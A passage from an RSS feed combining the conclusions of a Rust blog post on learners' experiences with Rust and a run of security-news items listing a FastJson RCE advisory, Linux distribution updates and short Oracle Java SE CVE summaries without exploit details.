<p>The thing that stood out most to us was the lack of real, first-hand knowledge of having bounced when learning Rust. While this is an obvious effect of soliciting answers to our survey and opportunities to interview through Rust channels and our networks, this cohort is good future candidate where interviews could start.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#conclusions"></a>
Conclusions</h3>
<p>Across these conversations, the experience of learning Rust depended heavily on context. Why someone was learning and what support they had mattered as much as the borrow checker. The same kinds of examples kept coming up: a training course that got a team to a shared baseline, a maintainer answering a student's first GitHub issue, and a colleague whose code showed that cloning was okay.</p>
<p>That context is largely something the community has a hand in. With that in mind, here is what we take away from what we heard, and what we still don't know.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-seems-worth-trying"></a>
What seems worth trying</h4>
<p><strong>Learning materials aimed at unlearning.</strong> Syntax barely came up when people described their struggles. People struggled with unlearning habits from previous languages, whether OOP structuring from C++ and Java or the instinct to grab a raw pointer to a peripheral. Most of our learning materials teach Rust from first principles, and that works. What we didn't come across is much written for, say, the engineer with ten years of Java who lands on a Rust team after a reorg: material that names the patterns they'll reach for that won't transfer, and shows what to do instead. The professor we spoke with did a version of this in the classroom, leaning on "traits are like interfaces in Java" and saving generics for later in the course, and the students did fine. Something similar could work outside the classroom too.</p>
<p><strong>Put the "clone freely while you're learning" advice somewhere official.</strong> Every experienced developer we spoke with gave the same advice, but learners seem to mostly pick it up by accident, like the researcher who happened to see someone else cloning the struct they had been carefully threading lifetimes through. Saying it early in official materials would take some of the steepness out of the curve. The broader version belongs there too: idiomatic Rust doesn't have to mean optimal Rust, especially on a first project.</p>
<p><strong>Diagnostics are already a primary learning resource: several people told us the compiler taught them lifetimes before any documentation did.</strong> Diagnostics reach learners right at the moment they're stuck. When writing new ones, it seems worth keeping the confused newcomer in mind alongside the expert, because for a lot of people this is where the learning happens.</p>
<p><strong>Is "the book" actually out of date?</strong> Whether or not The Rust Programming Language or other materials are actually behind, a team evaluating Rust looked at its repository, saw unresolved issues and unmerged PRs, and moved on. As more companies evaluate adoption, more people will look at these materials with the same fresh eyes. Visible issue triage and some communication about what's current and what's planned would address the perception, separately from whatever content work may or may not be needed.</p>
<p><strong>How stuck learners get treated is shaping who stays.</strong> We heard about students getting answers on GitHub from the maintainers who wrote the code, and we heard about learners being told their struggles were a skill issue. The first group came away with a lasting good impression of Rust. Some of the second group walked away entirely, and because they leave quietly, it's easy to underestimate how many of them there are. The welcoming side of the community came up unprompted as a reason people stayed, so we know it makes a difference when we get this right.</p>
<p><strong>Every organization we spoke with described essentially the same ramp-up for bringing a team to Rust.</strong> Teams that brought groups of developers to Rust described roughly the same approach: get everyone to a shared baseline with a training course or with The Rust Programming Language and Rustlings, start people on lower-risk tickets, and give them somewhere internal to ask questions. Several organizations also found that hiring developers without Rust experience and ramping them up worked out better than continuing to search for rare expertise in another language. None of this is complicated, and teams weighing adoption don't need to invent a training program from scratch.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-we-still-don-t-know"></a>
What we still don't know</h4>
<p>The biggest gap is the people we didn't reach. Nearly everyone we spoke with stuck with Rust long enough to be reachable through Rust channels, so the stories of bouncing off came to us second-hand: a friend who walked away from embedded Rust, colleagues who quietly stopped after the responses they got. As we wrote in <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">our first post</a>, finding people who decided against Rust takes targeted outreach. If the proposed User Research team comes together, talking with learners who bounced would make a good early project, and learning is probably the area where that research would teach us the most.</p>
<p>We also don't know what to make of LLMs as a learning tool yet. They came up as a search engine, as an example generator, and in one organization's case as something that makes training high school graduates into working Rust developers possible. We saw a classroom where the C cohort leaned on LLMs in ways the Rust cohort couldn't, and we don't have an explanation for it. All of this comes from a handful of conversations, so we treat it as a set of leads to follow up on. Given how quickly the tools are changing, it seems better to study this deliberately than to wait and see what folklore develops.</p>
<p>The folks we spoke with showed that people do get there: with enough passes through the materials and enough code written, it eventually clicks. The opportunities above are mostly about making it work for the people who didn't pick Rust on purpose, and for the ones who would have stuck around if their early experience had gone a little differently.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Imperva Customers Protected Against CVE-2026-16723: Critical FastJson 1.x Zero-Day RCE]]></title>
<description><![CDATA[TL;DR: A critical remote code execution vulnerability has been disclosed in FastJson, a widely used JSON processing library for Java. The vulnerability, assigned CVE-2026-16723 with a CVSS score of 9.0 (Critical), affects FastJson versions 1.2.68 through 1.2.83 under specific Spring Boot deployme...]]></description>
<link>https://tsecurity.de/de/3692642/it-security-nachrichten/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1x-zero-day-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692642/it-security-nachrichten/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1x-zero-day-rce/</guid>
<pubDate>Fri, 24 Jul 2026 23:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TL;DR: A critical remote code execution vulnerability has been disclosed in FastJson, a widely used JSON processing library for Java. The vulnerability, assigned CVE-2026-16723 with a CVSS score of 9.0 (Critical), affects FastJson versions 1.2.68 through 1.2.83 under specific Spring Boot deployment conditions and can be exploited using malicious JSON without authentication, enabling AutoType, or relying on third-party gadget classes.  Imperva customers are protected against exploitation attempts […]</p>
<p>The post <a href="https://www.imperva.com/blog/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1-x-zero-day-rce/">Imperva Customers Protected Against CVE-2026-16723: Critical FastJson 1.x Zero-Day RCE</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Imperva Customers Protected Against CVE-2026-16723: Critical FastJson 1.x Zero-Day RCE]]></title>
<description><![CDATA[TL;DR: A critical remote code execution vulnerability has been disclosed in FastJson, a widely used JSON processing library for Java. The vulnerability, assigned CVE-2026-16723 with a CVSS score of 9.0 (Critical), affects FastJson versions 1.2.68 through 1.2.83 under specific Spring Boot deployme...]]></description>
<link>https://tsecurity.de/de/3692433/it-security-nachrichten/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1x-zero-day-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692433/it-security-nachrichten/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1x-zero-day-rce/</guid>
<pubDate>Fri, 24 Jul 2026 22:11:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TL;DR: A critical remote code execution vulnerability has been disclosed in FastJson, a widely used JSON processing library for Java. The vulnerability, assigned CVE-2026-16723 with a CVSS score of 9.0 (Critical), affects FastJson versions 1.2.68 through 1.2.83 under specific Spring Boot deployment conditions and can be exploited using malicious JSON without…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1-x-zero-day-rce/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/imperva-customers-protected-against-cve-2026-16723-critical-fastjson-1-x-zero-day-rce/">Imperva Customers Protected Against CVE-2026-16723: Critical FastJson 1.x Zero-Day RCE</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60166 | Oracle Java SE 8u491 JavaFX information disclosure (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE 8u491. It has been classified as problematic. This impacts an unknown function of the component JavaFX. Performing a manipulation results in information disclosure.

This vulnerability is known as CVE-2026-60166. Remote exploitation of the attack is pos...]]></description>
<link>https://tsecurity.de/de/3690734/sicherheitsluecken/cve-2026-60166-oracle-java-se-8u491-javafx-information-disclosure-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690734/sicherheitsluecken/cve-2026-60166-oracle-java-se-8u491-javafx-information-disclosure-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 07:07:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>JavaFX</em>. Performing a manipulation results in information disclosure.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-60166">CVE-2026-60166</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60526 | Oracle Java SE 8u491/8u491-perf Installation sandbox (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Oracle Java SE 8u491/8u491-perf. This issue affects some unknown processing of the component Installation. Such manipulation leads to sandbox issue.

This vulnerability is uniquely identified as CVE-2026-60526. The attack can be laun...]]></description>
<link>https://tsecurity.de/de/3690732/sicherheitsluecken/cve-2026-60526-oracle-java-se-8u4918u491-perf-installation-sandbox-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690732/sicherheitsluecken/cve-2026-60526-oracle-java-se-8u4918u491-perf-installation-sandbox-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 07:07:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491/8u491-perf</a>. This issue affects some unknown processing of the component <em>Installation</em>. Such manipulation leads to sandbox issue.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-60526">CVE-2026-60526</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in java-1.8.0-openjdk (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3690708/unix-server/security-mehrere-probleme-in-java-180-openjdk-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690708/unix-server/security-mehrere-probleme-in-java-180-openjdk-red-hat/</guid>
<pubDate>Fri, 24 Jul 2026 06:31:46 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in java-21-openjdk (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3690705/unix-server/security-mehrere-probleme-in-java-21-openjdk-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690705/unix-server/security-mehrere-probleme-in-java-21-openjdk-red-hat/</guid>
<pubDate>Fri, 24 Jul 2026 06:31:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in java-17-openjdk (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3690703/unix-server/security-mehrere-probleme-in-java-17-openjdk-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690703/unix-server/security-mehrere-probleme-in-java-17-openjdk-red-hat/</guid>
<pubDate>Fri, 24 Jul 2026 06:31:35 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in java-1.8.0-openjdk (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3690693/unix-server/security-mehrere-probleme-in-java-180-openjdk-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690693/unix-server/security-mehrere-probleme-in-java-180-openjdk-red-hat/</guid>
<pubDate>Fri, 24 Jul 2026 06:31:12 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47013 | Oracle Java SE 8u491 JavaFX denial of service (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability has been found in Oracle Java SE 8u491 and classified as problematic. This affects an unknown function of the component JavaFX. The manipulation leads to denial of service.

This vulnerability is referenced as CVE-2026-47013. Remote exploitation of the attack is possible. No explo...]]></description>
<link>https://tsecurity.de/de/3690614/sicherheitsluecken/cve-2026-47013-oracle-java-se-8u491-javafx-denial-of-service-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690614/sicherheitsluecken/cve-2026-47013-oracle-java-se-8u491-javafx-denial-of-service-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 05:21:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function of the component <em>JavaFX</em>. The manipulation leads to denial of service.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-47013">CVE-2026-47013</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47030 | Oracle Java SE 8u491 JavaFX sandbox (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE 8u491. It has been classified as problematic. Affected by this vulnerability is an unknown functionality of the component JavaFX. This manipulation causes sandbox issue.

This vulnerability is handled as CVE-2026-47030. The attack can be initiated remot...]]></description>
<link>https://tsecurity.de/de/3690613/sicherheitsluecken/cve-2026-47030-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690613/sicherheitsluecken/cve-2026-47030-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 05:21:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>JavaFX</em>. This manipulation causes sandbox issue.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-47030">CVE-2026-47030</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47034 | Oracle Java SE 8u491 JavaFX sandbox (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Oracle Java SE 8u491. Impacted is an unknown function of the component JavaFX. This manipulation causes sandbox issue.

This vulnerability appears as CVE-2026-47034. The attack may be initiated remotely. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3690612/sicherheitsluecken/cve-2026-47034-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690612/sicherheitsluecken/cve-2026-47034-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 05:21:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a>. Impacted is an unknown function of the component <em>JavaFX</em>. This manipulation causes sandbox issue.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-47034">CVE-2026-47034</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47035 | Oracle Java SE 8u491 JavaFX sandbox (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Oracle Java SE 8u491. The affected element is an unknown function of the component JavaFX. Such manipulation leads to sandbox issue.

This vulnerability is traded as CVE-2026-47035. The attack may be launched remotely. There is no ex...]]></description>
<link>https://tsecurity.de/de/3690611/sicherheitsluecken/cve-2026-47035-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690611/sicherheitsluecken/cve-2026-47035-oracle-java-se-8u491-javafx-sandbox-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 05:21:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a>. The affected element is an unknown function of the component <em>JavaFX</em>. Such manipulation leads to sandbox issue.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-47035">CVE-2026-47035</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60164 | Oracle Java SE 8u491 JavaFX information disclosure (WID-SEC-2026-2443)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE 8u491 and classified as problematic. This affects an unknown function of the component JavaFX. Such manipulation leads to information disclosure.

This vulnerability is traded as CVE-2026-60164. The attack may be launched remotely. There is no exploit a...]]></description>
<link>https://tsecurity.de/de/3690610/sicherheitsluecken/cve-2026-60164-oracle-java-se-8u491-javafx-information-disclosure-wid-sec-2026-2443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690610/sicherheitsluecken/cve-2026-60164-oracle-java-se-8u491-javafx-information-disclosure-wid-sec-2026-2443/</guid>
<pubDate>Fri, 24 Jul 2026 05:21:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function of the component <em>JavaFX</em>. Such manipulation leads to information disclosure.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-60164">CVE-2026-60164</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46968 | Oracle Java SE up to 26.0.1 JSSE privileges management (Nessus ID 329234)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE up to 26.0.1. It has been rated as problematic. This impacts an unknown function of the component JSSE. This manipulation causes improper privilege management.

This vulnerability is registered as CVE-2026-46968. Remote exploitation of the attack is pos...]]></description>
<link>https://tsecurity.de/de/3690545/sicherheitsluecken/cve-2026-46968-oracle-java-se-up-to-2601-jsse-privileges-management-nessus-id-329234/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690545/sicherheitsluecken/cve-2026-46968-oracle-java-se-up-to-2601-jsse-privileges-management-nessus-id-329234/</guid>
<pubDate>Fri, 24 Jul 2026 03:47:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE up to 26.0.1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>JSSE</em>. This manipulation causes improper privilege management.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-46968">CVE-2026-46968</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47010 | Oracle Java SE/GraalVM for JDK/GraalVM Enterprise Edition ImageIO privileges management (Nessus ID 329234)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition. Affected is an unknown function of the component ImageIO. Such manipulation leads to improper privilege management.

This vulnerability is documented as CVE-2026-47010...]]></description>
<link>https://tsecurity.de/de/3690544/sicherheitsluecken/cve-2026-47010-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-imageio-privileges-management-nessus-id-329234/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690544/sicherheitsluecken/cve-2026-47010-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-imageio-privileges-management-nessus-id-329234/</guid>
<pubDate>Fri, 24 Jul 2026 03:47:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition</a>. Affected is an unknown function of the component <em>ImageIO</em>. Such manipulation leads to improper privilege management.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-47010">CVE-2026-47010</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47021 | Oracle GraalVM Enterprise Edition/GraalVM for JDK/Java SE 2D denial of service (Nessus ID 329234)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Oracle GraalVM Enterprise Edition, GraalVM for JDK and Java SE. Affected by this vulnerability is an unknown functionality of the component 2D. Performing a manipulation results in denial of service.

This vulnerability is reported as...]]></description>
<link>https://tsecurity.de/de/3690543/sicherheitsluecken/cve-2026-47021-oracle-graalvm-enterprise-editiongraalvm-for-jdkjava-se-2d-denial-of-service-nessus-id-329234/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690543/sicherheitsluecken/cve-2026-47021-oracle-graalvm-enterprise-editiongraalvm-for-jdkjava-se-2d-denial-of-service-nessus-id-329234/</guid>
<pubDate>Fri, 24 Jul 2026 03:46:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/oracle:graalvm_enterprise_edition">Oracle GraalVM Enterprise Edition, GraalVM for JDK and Java SE</a>. Affected by this vulnerability is an unknown functionality of the component <em>2D</em>. Performing a manipulation results in denial of service.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-47021">CVE-2026-47021</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46917 | Oracle Java SE/GraalVM for JDK/GraalVM Enterprise Edition JSSE denial of service (Nessus ID 329232)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition. This impacts an unknown function of the component JSSE. Such manipulation leads to denial of service.

This vulnerability is traded as CVE-2026-46917. The attack may be launche...]]></description>
<link>https://tsecurity.de/de/3690542/sicherheitsluecken/cve-2026-46917-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-jsse-denial-of-service-nessus-id-329232/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690542/sicherheitsluecken/cve-2026-46917-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-jsse-denial-of-service-nessus-id-329232/</guid>
<pubDate>Fri, 24 Jul 2026 03:46:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition</a>. This impacts an unknown function of the component <em>JSSE</em>. Such manipulation leads to denial of service.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-46917">CVE-2026-46917</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47027 | Oracle Java SE up to 26.0.1 Libraries resource consumption (Nessus ID 329234)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Oracle Java SE up to 26.0.1. Affected by this issue is some unknown functionality of the component Libraries. Executing a manipulation can lead to resource consumption.

This vulnerability appears as CVE-2026-47027. The attack may be perfor...]]></description>
<link>https://tsecurity.de/de/3690541/sicherheitsluecken/cve-2026-47027-oracle-java-se-up-to-2601-libraries-resource-consumption-nessus-id-329234/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690541/sicherheitsluecken/cve-2026-47027-oracle-java-se-up-to-2601-libraries-resource-consumption-nessus-id-329234/</guid>
<pubDate>Fri, 24 Jul 2026 03:46:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE up to 26.0.1</a>. Affected by this issue is some unknown functionality of the component <em>Libraries</em>. Executing a manipulation can lead to resource consumption.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-47027">CVE-2026-47027</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47059 | Oracle Java SE/GraalVM for JDK/GraalVM Enterprise Edition 2D denial of service (Nessus ID 329234)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition. This affects an unknown part of the component 2D. The manipulation leads to denial of service.

This vulnerability is traded as CVE-2026-47059. It is possible to initiate the...]]></description>
<link>https://tsecurity.de/de/3690540/sicherheitsluecken/cve-2026-47059-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-2d-denial-of-service-nessus-id-329234/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690540/sicherheitsluecken/cve-2026-47059-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-2d-denial-of-service-nessus-id-329234/</guid>
<pubDate>Fri, 24 Jul 2026 03:46:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition</a>. This affects an unknown part of the component <em>2D</em>. The manipulation leads to denial of service.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-47059">CVE-2026-47059</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
